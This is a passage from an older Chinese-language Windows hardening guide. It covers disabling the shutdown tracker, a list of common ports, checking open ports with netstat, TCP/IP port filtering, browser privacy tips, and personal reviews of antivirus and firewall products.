开始“Start -/>”运行“ Run -/>输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-/> ”管理模板“(Administrative Templates)-/> ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口
17、常见端口的介绍
TCP
21 FTP
22 SSH
23 TELNET
25 TCP SMTP
53 TCP DNS
80 HTTP
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWhere
5632 UDP PCANYWhere
3389 Terminal Services
4444[冲击波]
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了
18、另外介绍一下如何查看本机打开的端口和tcp\ip端口的过滤
开始--运行--cmd
输入命令netstat -a
会看到例如(这是我的机器开放的端口)
Proto Local Address Foreign Address State
TCP yf001:epmap yf001:0 LISTE
TCP yf001:1025 yf001:0 LISTE
TCP (用户名):1035 yf001:0 LISTE
TCP yf001:netbios-ssn yf001:0 LISTE
UDP yf001:1129 *:*
UDP yf001:1183 *:*
UDP yf001:1396 *:*
UDP yf001:1464 *:*
UDP yf001:1466 *:*
UDP yf001:4000 *:*
UDP yf001:4002 *:*
UDP yf001:6000 *:*
UDP yf001:6001 *:*
UDP yf001:6002 *:*
UDP yf001:6003 *:*
UDP yf001:6004 *:*
UDP yf001:6005 *:*
UDP yf001:6006 *:*
UDP yf001:6007 *:*
UDP yf001:1030 *:*
UDP yf001:1048 *:*
UDP yf001:1144 *:*
UDP yf001:1226 *:*
UDP yf001:1390 *:*
UDP yf001:netbios-ns *:*
UDP yf001:netbios-dgm *:*
UDP yf001:isakmp *:*
现在讲讲基于Windows的tcp/ip的过滤
控制面板——网络和拨号连接——本地连接——INTERNET协议(tcp/ip)--属性--高级---选项-tcp/ip筛选--属性!!
然后添加需要的tcp 和UDP端口就可以了~如果对端口不是很了解的话,不要轻易进行过滤,不然可能会导致一些程序无法使用。
19、关于浏览器
IE浏览器(或基于IE内核的浏览器)存在隐私问题,index.dat文件里记录着你上网的信息。所以我推荐大家换一款其他内核浏览器。
现在炒的很热的FireFox,就很不错,如果你想打造一款属于自己的个性化浏览器,那FireFox是首选。它有强大的扩展定制功能!
还有传说中那款最快的浏览器 Opera ,速度惊人,界面华丽,笔者正在使用。(就在3个小时前,OPERA公司10年庆祝送正式注册码,笔者申请了两个,^_^)
当然,由于国内一些网页并不是用WC3组织认证的标准HTML语言编写,所以IE还是不能丢,留作备用。
处理IE隐私可以用:Webroot WindowWasher -- www.hanzify.org 上有正式版+汉化补丁
Ccleaner -- GOOGLE一下,官方占上有,多国语言的。
RAMDISK 用内存虚拟出一块硬盘,将缓存文件写进去,不仅解决了隐私问题,理论上还能提高网速。(建议内存/>=512M者使用)
20、最后一招,也是最关键的一招:安装杀软与防火墙
杀毒软件要看实力,绝对不能看广告。笔者在霏凡的病毒区混了半年,把杀软几乎也装了个遍,以下是个人心得:
1:国产杀软:江民一出,谁与争峰?KV的败笔就是当年那个硬盘炸弹吧,呵呵。其实论实力,江民在国内绝对是一支独秀。先进的杀毒引擎,较完整的病毒库,
清除活体病毒能力强,杀壳能力强,可杀连环DLL,监控灵敏,占系统内存小。--声明:我不是KV的枪手,因为国内的杀软公司普遍只会打广告,应该BS一下。
DB2005都到了2005了才杀两个壳?Rising的误报天下第一,可是随便下个毒包基本上没有它报的(不信的去霏凡病毒区试试:bbs.crsky.com);费尔还不错,
可是与KV比还有差距;光华虽然是主动升级,但毒库也不是很全。
2:国外杀软:百家争鸣!
Kapersky:这款俄国的杀软在国内极度火热,其拥有世界第一的毒库,毒库3小时一升级,对系统提供最完善的保护。
McAfee:美国杀软,柔和而强劲的保护,适合有点资历的用户。规则指定得当,百毒不侵。
Norton: 唉!老了老了,对国内木马简直是白痴。本不想说它,可是又是国际三大杀软之一,唉!
NOD32:占资源超小,杀毒超快,监控灵敏,只是毒库似乎有些不全。
BitDefender:罗马尼亚不错的杀软,能力平衡。
GData AntiVirusKit:真正的强悍!它用Kapersky+BitDefender的双引擎,而且经优化处理,系统不会很卡。
F-Scure:竟然夸张到4引擎!不过除了Kapersky4.0的引擎,其他的很一般。虽然保护是很周到,但用它笔者觉得不如AVK(上一个)。
笔者建议:一般配置 KV2005 or McAfee or Kapersky or GData AntiVirusKit;-配置稍好的可以用以上任一款(除KV2005)+ KV2004
老爷机配置 KV2004 or NOD32
较好的机器 GData AntiVirusKit+KV2005 or Kapersky+KV2005 or McAfee+KV2005
防火墙,系统的最后一道防线。即使杀软再强大,一些最新变种的木马仍能见缝插针。没有防火墙,你的机器很可能成为Haker的代理服务器,呵呵。还有,如果你的
系统有漏洞,Haker也会轻而易举的Contral Your PC.
强大的防火墙推荐:Look 'n' Stop :世界测评第一。占内存超小。启动超迅速。
ZoneAlarm :性力强大,功能很多,全面且稳定。
Tiny :这是一款专业到恐怖的防火墙,能力绝对强悍!适合较专业者使用。
天网:国内最强的了,只是和国外的比......
说一句,木马专杀的东西几乎没用,因为那些根本没有什么先进的引擎。如果一定要,就用ewido吧,这个还可以。